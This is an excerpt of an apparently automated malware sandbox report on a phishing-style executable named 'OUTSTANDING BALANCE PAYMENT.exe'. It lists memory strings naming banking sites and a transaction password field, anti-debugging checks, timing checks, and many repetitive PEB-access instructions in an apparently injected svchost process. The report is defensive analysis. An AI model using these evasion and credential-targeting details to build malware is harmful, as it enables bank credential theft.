                Source: QvLFrfAuvuCLc.exe, 00000006.00000002.4596075851.00000000011BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tportal.hdfcbank.comVMware20,11696487552
                Source: z5f52P3-.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: z5f52P3-.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe API call chain: ExitProcess graph end node graph_0-93178
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe API call chain: ExitProcess graph end node graph_0-93824
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\bitsadmin.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E rdtsc 2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417B23 LdrLoadDll, 2_2_00417B23
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002D6AAF BlockInput, 0_2_002D6AAF
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_00283D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00283D19
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_002B3920
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_0029E01E LoadLibraryA,GetProcAddress, 0_2_0029E01E
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_01227678 mov eax, dword ptr fs:[00000030h] 0_2_01227678
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_01228C88 mov eax, dword ptr fs:[00000030h] 0_2_01228C88
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_01228CE8 mov eax, dword ptr fs:[00000030h] 0_2_01228CE8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D437C mov eax, dword ptr fs:[00000030h] 2_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h] 2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h] 2_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h] 2_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370634F mov eax, dword ptr fs:[00000030h] 2_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] 2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h] 2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] 2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h] 2_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h] 2_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036663FF mov eax, dword ptr fs:[00000030h] 2_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h] 2_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h] 2_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] 2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h] 2_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] 2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h] 2_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] 2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] 2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362826B mov eax, dword ptr fs:[00000030h] 2_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h] 2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h] 2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370625D mov eax, dword ptr fs:[00000030h] 2_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h] 2_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636259 mov eax, dword ptr fs:[00000030h] 2_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h] 2_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362823B mov eax, dword ptr fs:[00000030h] 2_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] 2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h] 2_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h] 2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
